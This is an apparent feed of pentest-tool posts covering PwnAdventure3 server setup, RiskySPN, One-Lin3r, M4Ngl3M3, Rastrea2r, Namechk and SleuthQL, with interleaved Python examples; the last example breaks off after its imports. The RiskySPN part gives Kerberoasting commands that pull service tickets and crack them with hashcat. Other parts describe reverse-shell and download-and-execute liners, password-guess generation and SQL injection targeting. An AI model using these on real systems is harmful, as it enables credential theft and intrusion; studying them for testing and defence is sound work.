PwnAdventure3 – Game Open-World MMORPG Intentionally Vulnerable To Hacks

Pwnie Island is a limited-release, first-person, true open-world MMORPG set on a beautiful island where anything could happen. That's because this game is intentionally vulnerable to all kinds of silly hacks! Flying, endless cash, and more are all one client change or network proxy away. Are you ready for the mayhem?

Official Site: http://www.pwnadventure.com/

YouTube Series

This setup is part of a video series covering the different hacks and challenges in this game.

Let's Play/Hack – Pwn Adventure 3: Pwnie Island – part 1
Setup Private Server with Docker – Pwn Adventure 3: part 2
Information Gathering / Recon – Pwn Adventure 3: part 3
Recover Game Classes with gdb – Pwn Adventure 3: part 4
Hooking on Linux with LD_PRELOAD – Pwn Adventure 3: part 5
Flying and our first Flag! (Cow King) – Pwn Adventure 3: part 6
Teleporting and Hovering (Unbearable Revenge) – Pwn Adventure 3: part 7

Install Server

Requirements

From the official README:

At least 2GB of RAM; more RAM will allow more instances to be run on a single machine. The Game Server does not need any graphics hardware and runs purely on console. It is known to run well on Amazon AWS and Digital Ocean VPS instances. The Game Server requires a lot of RAM to run, but uses fork and copy-on-write memory to allow many instances to run on a single host. For a server with 2GB of RAM, it is not recommended to run more than 5 instances, but a server with 8GB of RAM can typically run as many as the CPU can handle. It is recommended to use 2-3 instances per CPU core if you have sufficient RAM. You may be able to run 4-5 instances per core, but doing so may introduce slight lag. The files for the client and server are over 2GB as well, so several GB of free disk space are required.

There are several ways to build and deploy your own server.

Option 1 – Original

One option is to download and follow the instructions included in the README of the official files. The download can be found on the official website here: http://www.pwnadventure.com/#server.

Option 2 – Guide

@Beaujeant created an excellent, easy-to-follow step-by-step guide. It was also the basis for building the docker image from Option 3. The guide can be found here: https://github.com/beaujeant/PwnAdventure3/blob/master/INSTALL-server.md.

Option 3 – Docker

This option is super easy, as long as docker and docker-compose are installed on a host. It makes it easy to run and tear down a server without making changes to the actual host system.

First, gather all necessary files:

git clone https://github.com/LiveOverflow/PwnAdventure3.git
cd PwnAdventure3
wget http://pwnadventure.com/pwn3.tar.gz
tar -xvf pwn3.tar.gz

In order to run the server, docker and docker-compose have to be installed. Docker is moving fast, so it's a good idea to follow the current official steps for installation (which could also include removing an older system version of docker):

Docker CE Ubuntu: https://docs.docker.com/install/linux/docker-ce/ubuntu/
docker-compose: https://docs.docker.com/compose/install/

Make sure the current user is part of the docker group with: sudo usermod -a -G docker $USER. Restart or re-login and verify with id that the user is part of the docker group.

Then simply build the image and launch the master and game server:

docker-compose build
docker-compose up

docker-compose up can also run in detached/background mode with -d.

Install Client

First download the client from the official website here: http://www.pwnadventure.com/#downloads

To get a client connected to the new server, the server.ini of the client has to be modified. The server launched with docker expects that the hostnames master.pwn3 and game.pwn3 are being used (these could theoretically be changed in the docker/setup files). The server.ini for the client has to look something like this:

[MasterServer]
Hostname=master.pwn3
Port=3333

[GameServer]
Hostname=game.pwn3
Port=3000
Username=
Password=
Instances=

Make sure that the client can reach these hosts, for example by adding them to the /etc/hosts file. In this example the server is running on 192.168.178.57 and the entries for them would be:

192.168.178.57 master.pwn3
192.168.178.57 game.pwn3

Warning: Using an IP as Hostname in the server.ini does not work! I spent 2 hours trying to figure out what was wrong.

To stop the server, simply type docker-compose down.

Warning: The database file is not persistent – taking down the container resets everything. So backup first.

Troubleshooting

Error: docker-compose build

$ docker-compose build
Building init
ERROR: Error processing tar file(exit status 1): write /client/PwnAdventure3_Data/PwnAdventure3/PwnAdventure3/Content/Paks/Characters.pak: no space left on device

A: Get more disk space.

$ docker-compose build
Building init
ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?

A: Your user is probably not part of the docker group, or the docker service is not running. Run sudo usermod -a -G docker pwn3 and verify with id. Or: service docker restart.

File Integrity

Check if the archive is corrupted:

$ md5sum pwn3.tar.gz
d3f296461fa57996018ce0e4e5a653ee  pwn3.tar.gz
$ sha1sum pwn3.tar.gz
022bd5174286fd78cd113bc6da6d37ae9af1ae8e  pwn3.tar.gz

PwnAdventure3 Client Errors

Connection Error: Unable to connect to master server

This probably means that the MasterServer is not reachable.

Client issues:
Check the [MasterServer] entry in the client's server.ini.
Can you ping master.pwn3 from your system?
Is the IP correct in the /etc/hosts file?

Server issues:
Is the server running and listening on port 3333? Check with sudo netstat -tulpn. Is the master server listening?
tcp6 0 0 :::3333 :::* LISTEN 31913/docker-proxy
Check with docker ps if the two containers are up. Is the master server running?
880f93374070 pwn3server "/opt/pwn3/setup/mas…" 0.0.0.0:3333->3333/tcp, 5432/tcp pwnadventure3_master_1

Waiting in connection queue…

This means the MasterServer is reachable and is now waiting for a free GameServer that can be handed to the client. This probably means that no GameServer is running, or that it was not able to connect to the MasterServer.

Server issues:
Is a game server running and listening on ports 3000-3005? Check listening processes with sudo netstat -tulpn:
tcp6 0 0 :::3000 :::* LISTEN 32160/docker-proxy
Is the pwnadventure3_game_1 container running? Check with docker ps -a:
84343f81034f pwn3server "/opt/pwn3/setup/gam…" 0.0.0.0:3000-3010->3000-3010/tcp, 5432/tcp pwnadventure3_game_1
Do you see the following line in the log from docker-compose up? line 1: 7 Killed ./PwnAdventure3Server; pwnadventure3_game_1 exited with code 137. GET MORE RAM!

Docker versions

These versions were used during testing as a host:

$ uname -a
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ docker-compose version
docker-compose version 1.19.0, build 9e633ef
docker-py version: 2.7.0
CPython version: 2.7.13
OpenSSL version: OpenSSL 1.0.1t 3 May 2016
$ docker --version
Docker version 17.12.1-ce, build 7390fc6

Screenshots

Download PwnAdventure3
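As an added example (not code from the post or from the PwnAdventure3 project), the following Python check catches the two client-side misconfigurations the troubleshooting section above describes: an IP literal in Hostname and a hostname that has no /etc/hosts entry. The expected hostnames and ports are the docker defaults named in the post; the sample server.ini and hosts text are constructed.

```python
import configparser
import ipaddress

# Added example, not code from the post or the PwnAdventure3 project: validate a
# client server.ini against the docker setup described above. The hostnames and
# ports come from the post; the sample files below are constructed.
EXPECTED = {"MasterServer": ("master.pwn3", "3333"), "GameServer": ("game.pwn3", "3000")}


def is_ip_literal(value):
    """True for '192.168.178.57' or an IPv6 literal, False for a hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def hosts_map(hosts_text):
    """Parse /etc/hosts-style text into {hostname: ip}, skipping comments and blanks."""
    mapping = {}
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        for name in fields[1:]:
            mapping[name] = fields[0]
    return mapping


def check_server_ini(ini_text, hosts_text):
    """Return a list of problems; an empty list means the client should be able to connect."""
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    hosts = hosts_map(hosts_text)
    problems = []
    for section, (want_host, want_port) in EXPECTED.items():
        if not cfg.has_section(section):
            problems.append(f"missing [{section}] section")
            continue
        host = cfg.get(section, "Hostname", fallback="")
        port = cfg.get(section, "Port", fallback="")
        if is_ip_literal(host):
            # The post's warning: an IP in Hostname does not work, the client needs a name.
            problems.append(f"[{section}] Hostname={host} is an IP literal; use {want_host}")
        elif host != want_host:
            problems.append(f"[{section}] Hostname={host} but the docker setup expects {want_host}")
        elif host not in hosts:
            problems.append(f"[{section}] {host} has no /etc/hosts entry")
        if port != want_port:
            problems.append(f"[{section}] Port={port} but the docker setup exposes {want_port}")
    return problems


# Constructed samples mirroring the post's working configuration.
GOOD_INI = """[MasterServer]
Hostname=master.pwn3
Port=3333

[GameServer]
Hostname=game.pwn3
Port=3000
Username=
Password=
Instances=
"""
SAMPLE_HOSTS = "127.0.0.1 localhost\n192.168.178.57 master.pwn3\n192.168.178.57 game.pwn3\n"

if __name__ == "__main__":
    broken = GOOD_INI.replace("Hostname=master.pwn3", "Hostname=192.168.178.57")
    for label, ini in [("good", GOOD_INI), ("ip-literal", broken)]:
        print(label, check_server_ini(ini, SAMPLE_HOSTS) or "ok")
```

Run it against the real files with check_server_ini(open("server.ini").read(), open("/etc/hosts").read()); every returned string names the section and the value that needs changing.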

Link: http://feedproxy.google.com/~r/PentestTools/~3/1enkfDCYNho/pwnadventure3-game-open-world-mmorpg.html

RiskySPN – Detect And Abuse Risky SPNs

RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Names). This module can assist blue teams in identifying potentially risky SPNs, as well as red teams in escalating privileges by leveraging Kerberos and Active Directory.

For detailed information: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/

Usage

Install the module:

Import-Module .\RiskySPNs.psm1

Or just dot-source the script (you can also IEX from web):

. .\Find-PotentiallyCrackableAccounts.ps1

Make sure Set-ExecutionPolicy is Unrestricted or Bypass.

Get information about a function (very detailed :)):

Get-Help Get-TGSCipher -Full

All functions also have a -Verbose mode.

Search vulnerable SPNs

Find vulnerable accounts:

Find-PotentiallyCrackableAccounts

Sensitive + RC4 = $$$

Generate a full detailed report about vulnerable accounts (CISO <3):

Export-PotentiallyCrackableAccounts

Get tickets

Request a Kerberos TGS for an SPN:

Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

Or:

Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

The fun stuff :)

Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3

Download RiskySPN

Link: http://feedproxy.google.com/~r/PentestTools/~3/Zc66zkwABNE/riskyspn-detect-and-abuse-risky-spns.html

One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is a simple and light-weight framework inspired by the web-delivery module in Metasploit. It consists of various one-liners that aid in penetration testing operations:

Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.
Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.
Other: Holds liners with the general purpose of helping in penetration testing (ex: Mimikatz, Powerup, etc…) on the trending OSes (Windows, Linux, and macOS). "More OSes can be added too".

Features

Search for any one-liner in the database by its full name or partially.
You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added to the framework and credited with your name.
Autocomplete any framework command, with recommendations in case of typos (in case you love hacking like in the movies).
Command line arguments can be used to give the framework a resource file to load and execute for automation.
The ability to reload the database if you added any liner, without restarting the framework.
You can add any platform to the payloads database just by making a folder in the payloads folder and creating a ".liner" file there.
More…

The payloads database is not big now because this is the first edition, but it will get bigger with updates and contributions.

Screenshots

Usage

Commandline arguments

usage: one-lin3r [-h] [-r R] [-x X] [-q]

optional arguments:
  -h, --help  show this help message and exit
  -r          Execute a resource file (history file).
  -x          Execute a specific command (use ; for multiples).
  -q          Quiet mode (no banner).

Framework commands

Command          Description
--------         -------------
help/?           Show this help menu
list/show        List payloads you can use in the attack.
search           Search payloads for a specific one
use <payload>    Use an available payload
info <payload>   Get information about an available payload
banner           Display banner
reload/refresh   Reload the payloads database
check            Prints the core version and database version, then checks for them online.
history          Display the most important command line history from the beginning
save_history     Save command line history to a file
exit/quit        Exit the framework

Installing and requirements

To make the tool work at its best you must have:

Python 3.x or 2.x (preferred 3).
Linux (tested on Kali rolling), Windows, or Mac OS X (tested on 10.11).
The requirements mentioned in the next few lines.

Installing

For Windows (after downloading the ZIP and unzipping it):

python -m pip install ./One-Lin3r-master
one-lin3r -h

For Linux:

git clone https://github.com/D4Vinci/One-Lin3r.git
apt-get install libncurses5-dev
pip install ./One-Lin3r
one-lin3r -h

Updating the framework or the database

On Linux, while outside the directory:

cd One-Lin3r && git pull && cd ..
pip install ./One-Lin3r --upgrade

On Windows, if you don't have git installed, redownload the framework zipped!

Download One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html

M4Ngl3M3 – Common Password Pattern Generator Using Strings List

Common password pattern generator using strings list.

Quick Installation:

$ git clone https://github.com/localh0t/m4ngl3m3
$ cd m4ngl3m3
$ ./main.py

Basic Help:

usage: main.py [-h] [-fy FROM_YEAR] [-ty TO_YEAR] [-sy] [-nf NUMBERS_FILE]
               [-sf SYMBOLS_FILE] [-cf CUSTOM_FILE] [-sbs] [-sap]
               [-mm MUTATION_METHODS]
               MUTATION_MODE STRINGS_FILE OUTPUT_FILE

Common password pattern generator using strings list

positional arguments:
  MUTATION_MODE         Mutation mode to perform: (prefix-mode | suffix-mode | dual-mode)
  STRINGS_FILE          File with strings to mutate
  OUTPUT_FILE           Where to write the mutated strings

optional arguments:
  -h, --help            show this help message and exit
  -fy FROM_YEAR, --from-year FROM_YEAR
                        Year where our iteration starts (default: 2015)
  -ty TO_YEAR, --to-year TO_YEAR
                        Year where our iteration ends (default: 2020)
  -sy, --short-year     Also add shorter year form when iterating (default: False)
  -nf NUMBERS_FILE, --numbers-file NUMBERS_FILE
                        Numbers prefix/suffix file (default: ./files/numbers/numbers_set2.txt)
  -sf SYMBOLS_FILE, --symbols-file SYMBOLS_FILE
                        Symbols prefix/suffix file (default: ./files/symbols/symbols_set2.txt)
  -cf CUSTOM_FILE, --custom-file CUSTOM_FILE
                        Custom words/dates/initials/etc file (default: None)
  -sbs, --symbols-before-suffix
                        Insert symbols also before years/numbers/custom (when in suffix-mode or dual-mode) (default: False)
  -sap, --symbols-after-prefix
                        Insert symbols also after years/numbers/custom (when in prefix-mode or dual-mode) (default: False)
  -mm MUTATION_METHODS, --mutation-methods MUTATION_METHODS
                        Mutation methods to perform (comma separated, no spaces) (valid: see MUTATION_METHODS.md) (default: normal,uppercase,firstup,replacevowels)

--from-year (-fy), --to-year (-ty):

Here we set where we want our script to start and end iterating over years. Many times people include the current year in an effort to add some entropy. Because passwords could be outdated, or the years included could be in the (near) future, we add them as a range. For online environments, we would take a conservative approach and only include ranges in the order of (-1, +1) or (-2, +2). For offline environments, the range could be wider, (-20, +5) or even (-50, +10). Output example:

password2017
[…]
password2018
[…]
password2019

--short-year (-sy):

When iterating years, also add the shorter two-digit form. Output example:

password17
[…]
password18
[…]
password19

--numbers-file (-nf):

With this argument we select a file containing numbers that people frequently add to their passwords. By default I included 6 sets, the largest being set 6, and each of the others being a subset of the next one. The numbers included in the first sets (1, 2…) are more likely to be present than the ones only included in the later sets (…5, 6). Again, for online environments we would use the first three sets, whereas in offline environments we could use the last ones. By default, the script uses set number 2. Output example:

password1
[…]
password123
[…]
password1234

--symbols-file (-sf):

With this argument we select a file containing symbols that people frequently add to their passwords. Again, set number 1 is the shortest, set number 6 is the largest. The symbols included in the first sets (1, 2…) are more likely to be present than the ones only included in the later sets (…5, 6). By default, the script uses set number 2. Output example:

password123!
[…]
password2018?
[…]
password1234.

--custom-file (-cf):

Here we add anything else we know about our targets (that is not considered the "base" of the password itself). Let the creativity roll in! It could be anything from company initials, birth dates and special dates to specific years, short keywords, etc. These custom strings are treated in the same way as the years/numbers. Output example:

passwordABC
[…]
password01011980!
[…]
password.admin

MUTATION_MODE (positional argument):

With this parameter we select how the tool will work when shifting strings. You can choose one of three:

suffix-mode: It will add years, numbers, symbols and custom after the main string. Example: password2018!
prefix-mode: It will add years, numbers, symbols and custom before the main string. Example: !2018password
dual-mode: As the name suggests, it uses both modes (generates both outputs).

STRINGS_FILE (positional argument):

File containing strings to mutate. If you are, for example, doing a pentest and don't know where to start, I would suggest using a tool like CeWL to spider the company website and keeping the most recurring words (including the company name, of course).

OUTPUT_FILE (positional argument):

Simply, the file where we want to write the mutated strings.

--symbols-before-suffix (-sbs):

When this flag is enabled, and we are running the tool either in suffix-mode or dual-mode, the script will also add the symbols before years/numbers/custom. Output example:

password2018!
[…]
password!2018
[…]

--symbols-after-prefix (-sap):

When this flag is enabled, and we are running the tool either in prefix-mode or dual-mode, the script will also add the symbols after years/numbers/custom. Output example:

!2018password
[…]
2018!password
[…]

--mutation-methods (-mm):

With this parameter we define which mutation methods are going to be performed. Mutation methods are base transformations made before starting to iterate over years/numbers/symbols/custom. You can select as many mutation methods as you want. For a list of all valid mutation methods, check: MUTATION_METHODS.md. By default, m4ngl3m3! runs with the following: Normal, UpperCase, FirstUp and ReplaceVowels.

Usage examples:

Usage example (1):

$ ./main.py --from-year 2017 --to-year 2018 --symbols-before-suffix suffix-mode strings.txt output.txt

(or, shorter version)

$ ./main.py -fy 2017 -ty 2018 -sbs suffix-mode strings.txt output.txt
[!] Starting…
[+] Normal-Mangling mutation method done on string: admin
[+] UpperCase-Mangling mutation method done on string: admin
[+] FirstUp-Mangling mutation method done on string: admin
[+] ReplaceVowels-Mangling mutation method done on string: admin
---
[+] Normal-Mangling mutation method done on string: companyname
[+] UpperCase-Mangling mutation method done on string: companyname
[+] FirstUp-Mangling mutation method done on string: companyname
[+] ReplaceVowels-Mangling mutation method done on string: companyname
---
[!] All done!
[!] Strings read: 2
[!] Strings written: 888
[!] Exiting …

"Iterate from year 2017 to 2018, default numbers and symbols file, suffix mode only, insert symbols also before suffix, default mutation methods."

Input file:

admin
companyname

Output file:

admin
admin!
[…]
Admin2017!
Admin!2017
[…]
COMPANYNAME1234!
COMPANYNAME!1234
[…]
c0mp4nyn4m32018@
c0mp4nyn4m3@2018
[…]

Usage example (2):

$ ./main.py -fy 2016 -ty 2019 -sy -nf ./files/numbers/numbers_set1.txt -sf ./files/symbols/symbols_set1.txt -sbs -sap -mm normal,firstup,doubleandfirstup,basicleet dual-mode strings.txt output.txt
[!] Starting…
[+] Normal-Mangling mutation method done on string: password
[+] FirstUp-Mangling mutation method done on string: password
[+] DoubleAndFirstUp-Mangling mutation method done on string: password
[+] BasicLeet-Mangling mutation method done on string: password
---
[+] Normal-Mangling mutation method done on string: example
[+] FirstUp-Mangling mutation method done on string: example
[+] DoubleAndFirstUp-Mangling mutation method done on string: example
[+] BasicLeet-Mangling mutation method done on string: example
---
[!] All done!
[!] Strings read: 2
[!] Strings written: 1288
[!] Exiting …

"Iterate from year 2016 to 2019, with short year form also, use set 1 for numbers and symbols, dual-mode (prefix and suffix), insert symbols also before suffix, insert symbols also after prefix, mutation methods: Normal, FirstUp, DoubleAndFirstUp, BasicLeet."

Input file:

password
example

Output file:

password
password!
password@
[…]
!2018PasswordPassword
!18PasswordPassword
2018!PasswordPassword
18!PasswordPassword
[…]
p455w0rd$1
p455w0rd123
p455w0rd123!
p455w0rd!123
[…]
Example!2019
Example!19
[…]

Download M4Ngl3M3
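The suffix-mode, prefix-mode and dual-mode rules and the -sy, -sbs and -sap flags described above can be written out as a short generator. The following is an added example, not m4ngl3m3's own code: the tool reads its number and symbol sets from files, so the NUMBERS and SYMBOLS lists and the vowel-replacement map here are constructed stand-ins. It goes one step beyond the README by also using the generator defensively: is_predictable() tells a password auditor whether a candidate is merely one of these manglings of a known base word.

```python
# Added example (not m4ngl3m3's own code): a small re-implementation of the
# suffix/prefix/dual-mode mangling described in the README, plus a defensive
# use of it. NUMBERS, SYMBOLS and LEET are constructed stand-ins for the tool's
# set files and its ReplaceVowels method.
NUMBERS = ["1", "12", "123", "1234"]
SYMBOLS = ["!", "@", "#", "$", "?", "."]
LEET = str.maketrans("aeios", "43105")


def mutation_methods(word):
    """Base transformations applied before any affix (the tool's defaults:
    normal, uppercase, firstup, replacevowels)."""
    return [word, word.upper(), word[:1].upper() + word[1:], word.translate(LEET)]


def affixes(from_year, to_year, short_year=False, custom=()):
    """Years (plus the two-digit form with -sy), then numbers, then custom strings."""
    out = []
    for year in range(from_year, to_year + 1):
        out.append(str(year))
        if short_year:
            out.append(str(year)[-2:])
    return out + list(NUMBERS) + list(custom)


def mangle(word, mode, from_year=2015, to_year=2020, short_year=False,
           symbols_before_suffix=False, symbols_after_prefix=False, custom=()):
    """Yield the candidates for one base string, without duplicates.

    suffix-mode: base+affix, base+affix+symbol, base+symbol (and base+symbol+affix with -sbs)
    prefix-mode: affix+base, symbol+affix+base, symbol+base (and affix+symbol+base with -sap)
    dual-mode:   both of the above
    """
    do_suffix = mode in ("suffix-mode", "dual-mode")
    do_prefix = mode in ("prefix-mode", "dual-mode")
    if not (do_suffix or do_prefix):
        raise ValueError("mode must be suffix-mode, prefix-mode or dual-mode")
    affix_list = affixes(from_year, to_year, short_year, custom)
    seen = set()
    for base in mutation_methods(word):
        candidates = [base]
        for sym in SYMBOLS:
            if do_suffix:
                candidates.append(base + sym)
            if do_prefix:
                candidates.append(sym + base)
        for affix in affix_list:
            if do_suffix:
                candidates.append(base + affix)
                for sym in SYMBOLS:
                    candidates.append(base + affix + sym)
                    if symbols_before_suffix:
                        candidates.append(base + sym + affix)
            if do_prefix:
                candidates.append(affix + base)
                for sym in SYMBOLS:
                    candidates.append(sym + affix + base)
                    if symbols_after_prefix:
                        candidates.append(affix + sym + base)
        for cand in candidates:
            if cand not in seen:
                seen.add(cand)
                yield cand


def generate(words, **options):
    """Equivalent of running the tool over a STRINGS_FILE: every candidate, in order."""
    out = []
    for word in words:
        out.extend(mangle(word, **options))
    return out


def is_predictable(password, base_words, **options):
    """Defensive check: does the password fall out of mangling any known base word?"""
    return any(password in mangle(word, **options) for word in base_words)


if __name__ == "__main__":
    # Mirrors the README's usage example (1): -fy 2017 -ty 2018 -sbs suffix-mode.
    out = generate(["admin", "companyname"], mode="suffix-mode",
                   from_year=2017, to_year=2018, symbols_before_suffix=True)
    print(len(out), "candidates;", "Admin!2017" in out)
    print(is_predictable("Admin2017!", ["admin"], mode="suffix-mode", from_year=2017, to_year=2018))
```

With the constructed sets the two input strings of example (1) yield 680 candidates rather than the README's 888, since the tool's real set 2 files are larger; the shape of the output (admin!, Admin2017!, Admin!2017, c0mp4nyn4m3@2018) is the same.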

Link: http://feedproxy.google.com/~r/PentestTools/~3/DLmcogzhpGU/m4ngl3m3-common-password-pattern.html

Rastrea2R – Collecting & Hunting For IOCs With Gusto And Style

Ever wanted to turn your AV console into an Incident Response & Threat Hunting machine? Rastrea2r (pronounced "rastreador", hunter in Spanish) is a multi-platform open source tool that allows incident responders and SOC analysts to triage suspect systems and hunt for Indicators of Compromise (IOCs) across thousands of endpoints in minutes. To parse and collect artifacts of interest from remote systems (including memory dumps), rastrea2r can execute Sysinternals tools, system commands and other 3rd party tools across multiple endpoints, saving the output to a centralized share for automated or manual analysis. By using a client/server RESTful API, rastrea2r can also hunt for IOCs on disk and in memory across multiple systems using YARA rules. As a command line tool, rastrea2r can be easily integrated within McAfee ePO, as well as other AV consoles and orchestration tools, allowing incident responders and SOC analysts to collect forensic evidence and hunt for IOCs without the need for an additional agent, with 'gusto' and style!

Dependencies

Python 2.7.x
git
bottle
requests
yara-python

Quickstart

Clone the project to your local directory (or download the zip file of the project):

$ git clone https://github.com/rastrea2r/rastrea2r.git
$ cd rastrea2r

All the dependencies necessary for the tool to run can be installed within a virtual environment via the provided makefile.

$ make help
help            - display this makefile's help information
venv            - create a virtual environment for development
clean           - clean all files using .gitignore rules
scrub           - clean all files, even untracked files
test            - run tests
test-verbose    - run tests [verbosely]
check-coverage  - perform test coverage checks
check-style     - perform pep8 check
fix-style       - perform check with autopep8 fixes
docs            - generate project documentation
check-docs      - quick check docs consistency
serve-docs      - serve project html documentation
dist            - create a wheel distribution package
dist-test       - test a wheel distribution package
dist-upload     - upload a wheel distribution package

Create a virtual environment with all dependencies:

$ make venv

Upon successful creation of the virtual environment, enter it as instructed, for example:

$ source /Users/ssbhat/.venvs/rastrea2r/bin/activate

Start the rastrea2r server by going to the $PROJECT_HOME/src/rastrea2r/server folder:

$ cd src/rastrea2r/server/
$ python rastrea2r_server_v0.3.py
Bottle v0.12.13 server starting up (using WSGIRefServer())…
Listening on http://0.0.0.0:8080/

Now execute the client program; depending on which platform you are trying to scan, choose the target python script appropriately. Currently Windows, Linux and Mac platforms are supported.

$ python rastrea2r_osx_v0.3.py -h
usage: rastrea2r_osx_v0.3.py [-h] [-v] {yara-disk,yara-mem,triage} …

Rastrea2r RESTful remote Yara/Triage tool for Incident Responders

positional arguments:
  {yara-disk,yara-mem,triage}
                 modes of operation
    yara-disk    Yara scan for file/directory objects on disk
    yara-mem     Yara scan for running processes in memory
    triage       Collect triage information from endpoint

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit

Furthermore, the available options under each command can be viewed by executing the help option, i.e.:

$ python rastrea2r_osx_v0.3.py yara-disk -h
usage: rastrea2r_osx_v0.3.py yara-disk [-h] [-s] path server rule

positional arguments:
  path          File or directory path to scan
  server        rastrea2r REST server
  rule          Yara rule on REST server

optional arguments:
  -h, --help    show this help message and exit
  -s, --silent  Suppresses standard output

For example, on a Mac or Unix system you would do:

$ cd src/rastrea2r/osx/
$ python rastrea2r_osx_v0.3.py yara-disk /opt http://127.0.0.1:8080/ test.yar

Executing rastrea2r on Windows

Apart from the libraries specified in requirements.txt, we need to install the following libraries:

PSutil for win64: https://github.com/giampaolo/psutil
WMI for win32: https://pypi.python.org/pypi/WMI/
Requests: pip install requests

Compiling rastrea2r

Make sure you have all the dependencies installed for the binary you are going to build on your Windows box. Then install:

Pywin32: http://sourceforge.net/projects/pywin32/files/ ** Windows only
Pyinstaller: https://github.com/pyinstaller/pyinstaller/wiki

Currently Supported functionality

yara-disk: Yara scan for file/directory objects on disk
yara-mem: Yara scan for running processes in memory
memdump: Acquires a memory dump from the endpoint ** Windows only
triage: Collects triage information from the endpoint ** Windows only

Notes

For the memdump and triage modules, SMB shares must be set up in this specific way:

Binaries (sysinternals, batch files and others) must be located in a shared folder called TOOLS (read only): \\path-to-share-folder\tools
Output is sent to a shared folder called DATA (write only): \\path-to-share-folder\data

For yara-mem and yara-disk scans, the yara rules must be in the same directory the server is executed from. The RESTful API server stores the data it receives in a file called results.txt in the same directory.

Contributing to rastrea2r project

The Developer Documentation provides complete information on how to contribute to the rastrea2r project.

Demo videos on Youtube

Video 1: Incident Response / Triage with rastrea2r on the command line – https://youtu.be/uFIZxqWeSyQ
Video 2: Remote Yara scans with rastrea2r on the command line – https://youtu.be/cnY1yEslirw
Video 3: Using rastrea2r with McAfee ePO – Client Tasks & Execution – https://youtu.be/jB17uLtu45Y

Presentations

rastrea2r at BlackHat Arsenal 2016 (check the PDF for documentation on usage and examples):
https://www.blackhat.com/us-16/arsenal.html#rastrea2r
https://github.com/aboutsecurity/Talks-and-Presentations/blob/master/Ismael_Valenzuela-Hunting_for_IOCs_rastrea2r-BH_Arsenal_2016.pdf

Recording of the talk on rastrea2r at the SANS Threat Hunting Summit 2016:
https://www.youtube.com/watch?v=0PvBsL6KKfA&feature=youtu.be&a

Credits & References

To Robert Gresham Jr. (@rwgresham) and Ryan O'Connor (@_remixed) for their contributions to the Triage module. Thanks folks!

To Ricardo Dias for the idea of using a REST server and his great paper on how to use Python and Yara with McAfee ePO: http://www.sans.org/reading-room/whitepapers/forensics/intelligence-driven-incident-response-yara-35542

Download Rastrea2R

Link: http://feedproxy.google.com/~r/PentestTools/~3/dD0nCbbILCw/rastrea2r-collecting-hunting-for-iocs.html

Namechk – Osint Tool Based On Namechk.Com For Checking Usernames On More Than 100 Websites, Forums And Social Networks

OSINT tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks.

Use:

Search available username: ./namechk.sh <username> -au
Search available username on specific websites: ./namechk.sh <username> -au -co
Search available username list: ./namechk.sh -l -au
Search used username: ./namechk.sh <username> -fu
Search used username on specific websites: ./namechk.sh <username> -fu -co
Search used username list: ./namechk.sh -l -fu

Tested webs

Download Namechk

Link: http://feedproxy.google.com/~r/PentestTools/~3/0dqBiyI9YQU/namechk-osint-tool-based-on-namechkcom.html

SleuthQL – Burp History Parsing Tool To Discover Potential SQL Injection Points

SleuthQL is a python3 script to identify parameters and values that contain SQL-like syntax. Once identified, SleuthQL will then insert SQLMap identifiers (*) into each parameter where the SQL-esque variables were identified.

Supported Request Types

SleuthQL requires an export of Burp's Proxy History. To obtain this export, simply navigate to your proxy history tab, highlight every item and click "Save Items". Ensure that each request is saved using base64 encoding. When SleuthQL scans the proxy history file, beyond the regular URL parameters, it will be able to identify vulnerable parameters from the following request content-types:

application/json
application/x-www-form-urlencoded
multipart/form-data

There are cases where this tool will break down. Namely, if there are nested content-types (such as a base64 encoded parameter within JSON data), it will not be able to identify those parameters. It also does not cover Cookies, as too often something such as CloudFlare will flag a parameter we're not interested in.

Why not Burp Pro?

Burp Pro's scanner is great, but isn't as full featured as SQLMap. Thus, if we can prioritize requests to feed into SQLMap in a batch-like manner and look for results this way, we can increase the detection rate of SQL injection.

Usage

(ASCII-art banner: SleuthQL – SQL Injection Discovery Tool, Rhino Security Labs, Dwight Hohnstein)

Usage: sleuthql.py -d example.com -f burpproxy.xml

SleuthQL is a script for automating the discovery of requests matching SQL-like parameter names and values. When discovered, it will display any matching parameters and paths that may be vulnerable to SQL injection. It will also create a directory with SQLMap ready request files.

Options:
  -h, --help            show this help message and exit
  -d DOMAINS, --domains=DOMAINS
                        Comma separated list of domains to analyze. i.e.: google.com,mozilla.com,rhinosecuritylabs.com
  -f PROXY_XML, --xml=PROXY_XML
                        Burp proxy history xml export to parse. Must be base64 encoded.
  -v, --verbose         Show verbose errors that occur during parsing of the input XML.

Output Files

For each potentially vulnerable request, the SQLMap parameterized request will be saved under $(pwd)/$domain/ as text files.

Video Demo

Download SleuthQL
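As an added example (not SleuthQL's own code), here is a stand-alone Python parser for the workflow described above: read a base64-encoded Burp history export, pull parameters from the query string and from the three supported body content-types, flag SQL-like names and values, and append sqlmap's * marker to each flagged value so the request can be reviewed. The SQL_NAME and SQL_VALUE heuristics are assumptions (the page does not list SleuthQL's own), and the Burp XML sample is constructed in the shape of a "Save Items" export. As the post notes for nested encodings, top-level JSON members only are inspected.

```python
import base64
import json
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_plus, urlsplit

# Assumed heuristics: SleuthQL's own lists of SQL-like names and values are not on the page.
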